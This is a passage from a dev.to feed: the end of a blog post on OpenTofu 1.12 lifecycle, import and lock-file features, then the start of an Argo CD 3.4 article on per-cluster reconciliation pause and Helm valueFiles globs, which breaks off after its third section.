&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"example_database"&lt;/span&gt; &lt;span class="s2"&gt;"example"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="c1"&gt;# ...&lt;/span&gt;

  &lt;span class="nx"&gt;lifecycle&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;# 1.12: can reference variables -&amp;gt; control delete protection per environment from one module&lt;/span&gt;
    &lt;span class="nx"&gt;prevent_destroy&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;prevent_destroy_database&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;Ops tip: keep the shared module default at &lt;code&gt;true&lt;/code&gt; (protected) and pass &lt;code&gt;false&lt;/code&gt; explicitly only from dev/staging callers. "Safe by default, exceptions explicit" is the pattern that prevents deletion accidents with the least code.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  3. destroy = false — Remove From State Without Destroying the Remote Object
&lt;/h2&gt;

&lt;p&gt;Another new lifecycle meta-argument, &lt;code&gt;destroy = false&lt;/code&gt;, lets you &lt;strong&gt;remove a managed resource from state without first destroying the remote object&lt;/strong&gt;. Previously, "I want to take this out of OpenTofu management but keep the actual infrastructure alive" had to be worked around with &lt;code&gt;removed&lt;/code&gt; blocks or &lt;code&gt;state rm&lt;/code&gt;. Expressed as a lifecycle argument, the intent now stays in code.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_s3_bucket"&lt;/span&gt; &lt;span class="s2"&gt;"legacy_logs"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;bucket&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"manoit-legacy-logs"&lt;/span&gt;

  &lt;span class="nx"&gt;lifecycle&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;# Exclude from destroy plans -&amp;gt; bucket is preserved even when dropped from state&lt;/span&gt;
    &lt;span class="nx"&gt;destroy&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;⚠️ Warning: an object dropped from state via &lt;code&gt;destroy = false&lt;/code&gt; is no longer tracked by OpenTofu. If other code creates a new resource with the same name, you may hit an "already exists" conflict — sort out your import/naming policy right after detaching.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  4. Resource Identity Import — From Guessing IDs to Schema-Based
&lt;/h2&gt;

&lt;p&gt;In OpenTofu, importing existing infrastructure has long meant "getting the resource's &lt;code&gt;id&lt;/code&gt; string exactly right." But id formats vary wildly by resource type, and resources using composite keys (multiple combined attributes) are awkward to express in a single id. 1.12.0 introduces &lt;strong&gt;import by resource identity&lt;/strong&gt;, pointing at the remote object via the attributes defined by the resource type's &lt;strong&gt;identity schema&lt;/strong&gt;, instead of a single id string.&lt;/p&gt;

&lt;p&gt;For example, hashicorp/aws's &lt;code&gt;aws_ssm_maintenance_window_target&lt;/code&gt; has an identity schema requiring both &lt;code&gt;id&lt;/code&gt; and &lt;code&gt;window_id&lt;/code&gt;. You can now specify these via the import block's &lt;code&gt;identity&lt;/code&gt; argument.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;import&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;to&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;aws_ssm_maintenance_window_target&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;example&lt;/span&gt;

  &lt;span class="c1"&gt;# 1.12: point precisely via identity schema attributes instead of guessing id&lt;/span&gt;
  &lt;span class="nx"&gt;identity&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;window_id&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"mw-0123456789abcdef0"&lt;/span&gt;
    &lt;span class="nx"&gt;id&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"12345678-90ab-cdef-1234-567890abcdef"&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;For bulk imports, combine this with the import block's &lt;code&gt;for_each&lt;/code&gt; (loopable imports, introduced in 1.10). The identity-schema + for_each combo turns "deterministically importing hundreds of existing resources" into a single block.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  5. Provider Checksum &amp;amp; Install Improvements — The End of tofu providers lock
&lt;/h2&gt;

&lt;p&gt;This is the change CI/CD operators will welcome most. Previously, teams using a global plugin cache or local mirror found the dependency lock file &lt;strong&gt;missing checksums&lt;/strong&gt; after &lt;code&gt;tofu init&lt;/code&gt;, forcing a separate &lt;code&gt;tofu providers lock&lt;/code&gt; run. The lock file only had &lt;code&gt;zh:&lt;/code&gt; (zip hashes), while the &lt;code&gt;h1:&lt;/code&gt; hashes needed for cache/mirror verification were only computed locally.&lt;/p&gt;

&lt;p&gt;In 1.12.0, the OpenTofu Registry officially provides &lt;strong&gt;the full set of checksum formats&lt;/strong&gt; needed by all install methods. So a single &lt;code&gt;tofu init&lt;/code&gt; fills the lock file with both &lt;code&gt;h1:&lt;/code&gt; and &lt;code&gt;zh:&lt;/code&gt; hashes, letting you verify a global cache or local mirror immediately. &lt;code&gt;tofu providers lock&lt;/code&gt; now remains only for its original purpose: populating origin-registry checksums on systems reconfigured to use an alternate install source.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# After upgrading, the first init auto-adds h1: hashes to the lock file&lt;/span&gt;
tofu init

&lt;span class="c"&gt;# No longer needed just because of cache/mirror (as long as you use the default registry)&lt;/span&gt;
&lt;span class="c"&gt;# tofu providers lock -platform=linux_amd64 -platform=darwin_arm64&lt;/span&gt;

&lt;span class="c"&gt;# Confirm both zh:/h1: hash types landed in the lock file&lt;/span&gt;
&lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-E&lt;/span&gt; &lt;span class="s1"&gt;'"(zh|h1):'&lt;/span&gt; .terraform.lock.hcl | &lt;span class="nb"&gt;head&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;On top of this, &lt;strong&gt;concurrent provider installation&lt;/strong&gt; was added. When many providers are needed, install requests are parallelized to cut &lt;code&gt;tofu init&lt;/code&gt; time. The effect is most noticeable on monolithic root modules with 10+ providers.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Situation&lt;/th&gt;
&lt;th&gt;Up to 1.11&lt;/th&gt;
&lt;th&gt;1.12.0&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Global cache / mirror verification&lt;/td&gt;
&lt;td&gt;run &lt;code&gt;providers lock&lt;/code&gt; manually after &lt;code&gt;init&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;h1 &amp;amp; zh auto-filled in one &lt;code&gt;init&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Installing many providers&lt;/td&gt;
&lt;td&gt;sequential requests&lt;/td&gt;
&lt;td&gt;concurrent (parallel) -&amp;gt; faster init&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lock file hashes&lt;/td&gt;
&lt;td&gt;mostly &lt;code&gt;zh:&lt;/code&gt;, &lt;code&gt;h1:&lt;/code&gt; computed locally&lt;/td&gt;
&lt;td&gt;full formats prepopulated at install time&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  6. Simultaneous Output (-json-into) and Observable IaC
&lt;/h2&gt;

&lt;p&gt;Many OpenTofu commands support both human-oriented UI output and machine-readable JSON, but until now you could only get one or the other. For tools building alternative UIs, this meant "you must reimplement the entire UI from JSON alone before it's usable." 1.12.0's &lt;code&gt;-json-into=FILENAME&lt;/code&gt; option sends the same machine-readable output as &lt;code&gt;-json&lt;/code&gt; to a separate file, while the standard output keeps showing the normal human-facing UI.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Human UI in the terminal, machine JSON to a file, simultaneously&lt;/span&gt;
tofu apply &lt;span class="nt"&gt;-json-into&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;apply-events.json

&lt;span class="c"&gt;# To consume streaming events in real time, use a named pipe / special device&lt;/span&gt;
&lt;span class="nb"&gt;mkfifo&lt;/span&gt; /tmp/tofu-events
tofu apply &lt;span class="nt"&gt;-json-into&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/tmp/tofu-events &amp;amp;
&lt;span class="c"&gt;# Read the pipe from another process to update a web/terminal UI instantly&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Stream the JSON into an IPC object like a named pipe or &lt;code&gt;/dev/fd/N&lt;/code&gt;, and an external tool can responsively display progress concurrently with OpenTofu's execution. Combined with the local-only &lt;strong&gt;OpenTelemetry tracing&lt;/strong&gt; introduced in 1.10, this opens the path to treating "IaC execution as an observable pipeline."&lt;/p&gt;

&lt;h2&gt;
  
  
  7. Deprecations — WinRM Provisioners and 32-bit
&lt;/h2&gt;

&lt;p&gt;1.12 is an operations-hardening release with few breaking changes, but you must be aware of two deprecation notices.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Item&lt;/th&gt;
&lt;th&gt;1.12 status&lt;/th&gt;
&lt;th&gt;Action&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;WinRM provisioner connections&lt;/td&gt;
&lt;td&gt;warning (deprecated), still functional&lt;/td&gt;
&lt;td&gt;slated for removal in v1.13 -&amp;gt; migrate to OpenSSH for Windows&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;32-bit CPU (&lt;code&gt;386&lt;/code&gt;, &lt;code&gt;arm&lt;/code&gt;) official builds&lt;/td&gt;
&lt;td&gt;no change in 1.12 (notice only)&lt;/td&gt;
&lt;td&gt;warnings from v1.13 -&amp;gt; builds dropped later, move to 64-bit (amd64/arm64)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;blockquote&gt;
&lt;p&gt;⚠️ Warning: if you have provisioners using &lt;code&gt;connection { type = "winrm" }&lt;/code&gt;, "later" won't cut it. It's fully removed in v1.13, so use this upgrade as the trigger to plan an OpenSSH-for-Windows migration. 32-bit environments likewise need a 64-bit move reviewed within the next year.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  8. Cumulative Changes: 1.10 -&amp;gt; 1.12
&lt;/h2&gt;

&lt;p&gt;For teams jumping from 1.9 or below, here are the cumulative highlights.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Area&lt;/th&gt;
&lt;th&gt;Introduced&lt;/th&gt;
&lt;th&gt;Core&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;State encryption (external key providers)&lt;/td&gt;
&lt;td&gt;1.10&lt;/td&gt;
&lt;td&gt;AWS/GCP KMS, OpenBao, PBKDF2 key provider chaining&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Native S3 state locking&lt;/td&gt;
&lt;td&gt;1.10&lt;/td&gt;
&lt;td&gt;S3 backend locking without DynamoDB&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;OCI registry distribution&lt;/td&gt;
&lt;td&gt;1.10&lt;/td&gt;
&lt;td&gt;distribute providers/modules to air-gapped environments&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Ephemeral values / &lt;code&gt;enabled&lt;/code&gt; meta-argument&lt;/td&gt;
&lt;td&gt;1.11&lt;/td&gt;
&lt;td&gt;in-memory-only data, conditional enable beyond count/for_each&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Dynamic prevent_destroy / destroy=false&lt;/td&gt;
&lt;td&gt;1.12&lt;/td&gt;
&lt;td&gt;per-environment delete protection, state-only removal&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Identity import / checksum automation&lt;/td&gt;
&lt;td&gt;1.12&lt;/td&gt;
&lt;td&gt;schema-based import, full hashes in one init&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  9. ManoIT Internal Adoption Checklist
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Task&lt;/th&gt;
&lt;th&gt;Owner&lt;/th&gt;
&lt;th&gt;Done when&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Bump staging root module to 1.12.0, review lock-file diff after first &lt;code&gt;init&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;h1 &amp;amp; zh hashes auto-added confirmed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Parameterize &lt;code&gt;prevent_destroy&lt;/code&gt; in shared DB/storage modules (default true)&lt;/td&gt;
&lt;td&gt;Module owners&lt;/td&gt;
&lt;td&gt;prod=protected, dev=off controlled by caller&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Apply &lt;code&gt;destroy = false&lt;/code&gt; to legacy resources to keep but unmanage&lt;/td&gt;
&lt;td&gt;Domain owners&lt;/td&gt;
&lt;td&gt;0 destroys in plan, remote object preserved&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Re-organize composite-key resources (SSM targets, etc.) via identity import&lt;/td&gt;
&lt;td&gt;Domain owners&lt;/td&gt;
&lt;td&gt;deterministic import via import block + for_each&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Remove the manual &lt;code&gt;tofu providers lock&lt;/code&gt; step from CI&lt;/td&gt;
&lt;td&gt;DevOps&lt;/td&gt;
&lt;td&gt;init alone verifies cache/mirror&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Stream apply events to the internal dashboard via &lt;code&gt;-json-into&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Observability&lt;/td&gt;
&lt;td&gt;live execution progress displayed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Inventory WinRM provisioners -&amp;gt; OpenSSH migration roadmap&lt;/td&gt;
&lt;td&gt;Infra&lt;/td&gt;
&lt;td&gt;0 winrm uses before v1.13&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  10. Conclusion — "The Next IaC Challenge Isn't Creation, It's Lifecycle"
&lt;/h2&gt;

&lt;p&gt;If I had to sum up OpenTofu 1.12.0 in one line: &lt;strong&gt;"creating resources is a solved problem; what remains is the lifecycle operations of protecting them differently per environment, detaching them safely, importing them accurately, and not fighting lock files."&lt;/strong&gt; Dynamic &lt;code&gt;prevent_destroy&lt;/code&gt; lets you control delete protection per environment from a single module. &lt;code&gt;destroy = false&lt;/code&gt; keeps the intent of "unmanage but preserve" in code. Identity import ends the era of guessing IDs. Checksum automation strips the manual &lt;code&gt;tofu providers lock&lt;/code&gt; out of CI. And &lt;code&gt;-json-into&lt;/code&gt; elevates IaC execution into an observable pipeline.&lt;/p&gt;

&lt;p&gt;Three closing recommendations. (1) &lt;strong&gt;Review the lock-file diff on the first init after upgrading&lt;/strong&gt; — a bulk addition of h1 hashes is normal, and committing it makes cache/mirror friction disappear. (2) &lt;strong&gt;Parameterize prevent_destroy in shared modules&lt;/strong&gt; — the change that cuts deletion accidents most for the least code. (3) &lt;strong&gt;If you use WinRM provisioners, inventory them now&lt;/strong&gt; — the v1.13 removal is not "optional" but a "scheduled deadline." The shortest one-liner: &lt;em&gt;"this sprint, bump staging to 1.12, turn the shared DB module's prevent_destroy into a variable, and run plans on both prod and dev once."&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://www.manoit.co.kr/forum/view/1483465" rel="noopener noreferrer"&gt;ManoIT Tech Blog&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>terraform</category>
      <category>devops</category>
      <category>cloud</category>
      <category>aws</category>
    </item>
    <item>
      <title>Argo CD 3.4 Deep Dive: Cluster Pause Reconciliation, Helm valueFiles Globs &amp; Source Hydrator Commit Authorship</title>
      <dc:creator>daniel jeong</dc:creator>
      <pubDate>Mon, 01 Jun 2026 22:32:04 +0000</pubDate>
      <link>https://dev.to/x4nent/argo-cd-34-deep-dive-cluster-pause-reconciliation-helm-valuefiles-globs-source-hydrator-commit-3195</link>
      <guid>https://dev.to/x4nent/argo-cd-34-deep-dive-cluster-pause-reconciliation-helm-valuefiles-globs-source-hydrator-commit-3195</guid>
      <description>&lt;p&gt;Anyone who has moved GitOps from demo to production knows the hard part isn't &lt;em&gt;deploying&lt;/em&gt; — it's everything after, the so-called &lt;strong&gt;Day-2 operations&lt;/strong&gt;. An incident hits at midnight, but the Argo CD controller keeps stubbornly reconciling everything back to its "desired state." Your &lt;code&gt;values&lt;/code&gt; files have multiplied into dozens per environment and you'd kill for a single glob. Hydration commits give no clue who authored them. And on dual-stack clusters, mysterious DNS timeouts quietly eat away at the controller.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Argo CD 3.4&lt;/strong&gt; (GA in May 2026, first stable tag &lt;code&gt;v3.4.1&lt;/code&gt;) takes direct aim at exactly these operational pains. As the official v3.4.1 release notes put it, the focus of this cycle is Day-2: incident management, alert routing, and Helm template flexibility. This article breaks down the root cause behind five of 3.4's key features from an operations and architecture angle, then lays out how ManoIT rolled them into our internal multi-cluster GitOps.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Why 3.4 — Quarterly Cadence, Center of Gravity Shifts to Day-2
&lt;/h2&gt;

&lt;p&gt;Some context first. Argo CD ships a minor release &lt;strong&gt;once per quarter (every 3 months)&lt;/strong&gt;, and only the three most recent minor versions get patches. If 3.2 was about UI and performance and 3.3 established the &lt;strong&gt;Source Hydrator&lt;/strong&gt; (the rendered-manifests pattern that hydrates manifests into a separate branch), then 3.4 sits on top of that and asks: "in production, what do we pause, what do we track, and what do we route?" The feature freeze locked at &lt;code&gt;v3.4.0-rc2&lt;/code&gt;, GA landed early May 2026, and patches followed quickly — &lt;code&gt;v3.4.3&lt;/code&gt; arrived on May 28, 2026.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Version&lt;/th&gt;
&lt;th&gt;GA&lt;/th&gt;
&lt;th&gt;Theme&lt;/th&gt;
&lt;th&gt;Headline&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;3.2&lt;/td&gt;
&lt;td&gt;H2 2025&lt;/td&gt;
&lt;td&gt;UI / performance&lt;/td&gt;
&lt;td&gt;UI overhaul, controller perf&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3.3&lt;/td&gt;
&lt;td&gt;Early 2026&lt;/td&gt;
&lt;td&gt;Rendered manifests&lt;/td&gt;
&lt;td&gt;Source Hydrator, PreDelete Hooks&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3.4&lt;/td&gt;
&lt;td&gt;2026-05&lt;/td&gt;
&lt;td&gt;Day-2 operations&lt;/td&gt;
&lt;td&gt;Cluster pause, Helm globs, hydrator commit author, AppSet Watch, gRPC DNS TXT off&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;3.4 is an &lt;strong&gt;operations-hardening release with few breaking changes&lt;/strong&gt;, but two environment shifts must be checked before upgrading (see section 7). First, the new features.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. Per-Cluster Pause Reconciliation — A New Standard for Incident Response
&lt;/h2&gt;

&lt;p&gt;Until now, "pausing reconciliation" in Argo CD meant per-application (switching an &lt;code&gt;Application&lt;/code&gt;'s sync policy to manual, or applying a sync window). The problem: the unit of an incident is often &lt;strong&gt;an entire cluster&lt;/strong&gt;. When a target cluster is unstable but the controller keeps pushing hundreds of its apps toward desired state, unintended rollbacks and redeploys pile on in the middle of an outage and make things worse.&lt;/p&gt;

&lt;p&gt;3.4 introduces an annotation that &lt;strong&gt;pauses reconciliation for an entire cluster&lt;/strong&gt; (PR #26442). Add the pause annotation to the cluster secret (or target resource) and the controller stops attempting reconciles against that cluster. It's exactly "hitting the brakes at the cluster level."&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Add the pause annotation to a cluster secret -&amp;gt; reconcile halts for that cluster&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Secret&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cluster-prod-apac&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;argocd&lt;/span&gt;
  &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;argocd.argoproj.io/secret-type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cluster&lt;/span&gt;
  &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="c1"&gt;# WARNING: pausing only stops "automatic convergence to desired state."&lt;/span&gt;
    &lt;span class="c1"&gt;# Already-running workloads keep running, and drift can accumulate.&lt;/span&gt;
    &lt;span class="na"&gt;argocd.argoproj.io/pause-reconciliation&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;true"&lt;/span&gt;
&lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Opaque&lt;/span&gt;
&lt;span class="na"&gt;stringData&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;prod-apac&lt;/span&gt;
  &lt;span class="na"&gt;server&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;https://k8s-prod-apac.internal:6443&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;Ops tip: read pause as "observation continues, only auto-convergence stops." Drift accumulates during the incident, so right after un-pausing, always inspect the diff first and sync only the intended changes.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  3. Helm valueFiles Wildcard Globs — Taming the values File Explosion
&lt;/h2&gt;

&lt;p&gt;Run multi-env, multi-region and your &lt;code&gt;values&lt;/code&gt; files grow exponentially: &lt;code&gt;values-base.yaml&lt;/code&gt;, &lt;code&gt;values-prod.yaml&lt;/code&gt;, &lt;code&gt;values-prod-apac.yaml&lt;/code&gt;, &lt;code&gt;values-feature-x.yaml&lt;/code&gt;… Previously you had to list each one in &lt;code&gt;valueFiles&lt;/code&gt;, and every new file meant editing the Application manifest too.&lt;/p&gt;

&lt;p&gt;3.4 supports &lt;strong&gt;wildcard glob patterns&lt;/strong&gt; in &lt;code&gt;valueFiles&lt;/code&gt; (PR #26768, cherry-picked to 3.4 as #26919). Get your directory convention right and you can pull in "every environment file under &lt;code&gt;values/&lt;/code&gt;" with a single line.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;argoproj.io/v1alpha1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Application&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;payments&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;argocd&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;source&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;repoURL&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;https://git.internal/manoit/payments-chart&lt;/span&gt;
    &lt;span class="na"&gt;targetRevision&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;main&lt;/span&gt;
    &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;chart&lt;/span&gt;
    &lt;span class="na"&gt;helm&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;valueFiles&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;values/base.yaml&lt;/span&gt;
        &lt;span class="c1"&gt;# 3.4: collect env values via glob (sort order = merge order)&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;values/prod-*.yaml"&lt;/span&gt;
  &lt;span class="na"&gt;destination&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;server&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;https://kubernetes.default.svc&lt;/span&gt;
    &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;payments&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;WARNING:&lt;/strong&gt; globs merge matched files in sorted order. Helm lets later values override earlier ones, so control merge precedence explicitly with filename prefixes (e.g. &lt;code&gt;10-&lt;/code&gt;, &lt;code&gt;20-&lt;/code&gt;). 90% of "why isn't my prod value taking effect?" is a merge-order problem.&lt;/p&gt;
&lt;/blockquote&gt;

